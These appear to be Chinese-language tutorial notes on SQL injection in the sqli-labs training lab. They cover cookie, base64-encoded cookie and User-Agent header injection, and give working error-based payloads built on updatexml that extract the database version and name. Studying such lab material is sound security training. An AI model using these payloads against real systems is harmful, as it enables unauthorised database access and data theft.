传参三大基本方法
向服务器传参三大基本方法:GPC
GET url中
POST body中
COOKIE http·请求头部中
get和post头部注入使用注释
get建议 --+
post用 #号
cookie注入–靶场sqli-labs-20关
以靶场20关为例子
浏览器下载谷歌浏览器插件HackBar
用报错注入updatexml
uname=Dumb' and updatexml(1,concat(0x7e,(select version()),0x7e),1) #;
获取数据库版本号
64位编码注入-22关
输入后显示报错
尝试输入base64–》看页面的响应
Dumb" --》解码为RHVtYiI=
通过报错的信息可以看出是双字符串结尾
通过报错函数页面返回数据库版本号
Dumb" and updatexml(1,concat(0x7e,(select version()),0x7e),1) #
user-Agent注入
在user-Agent进行输入是否有回显
User-Agent: aac' #
发现没有任何报错-继续尝试
User-Agent: aac' and '1'='1 #
页面有报错回显,此时可以增加报错函数查询数据库名
User-Agent: aac' and updatexml(1,concat(0x5e,(select database()),0x5e),1) and
'1'='1 #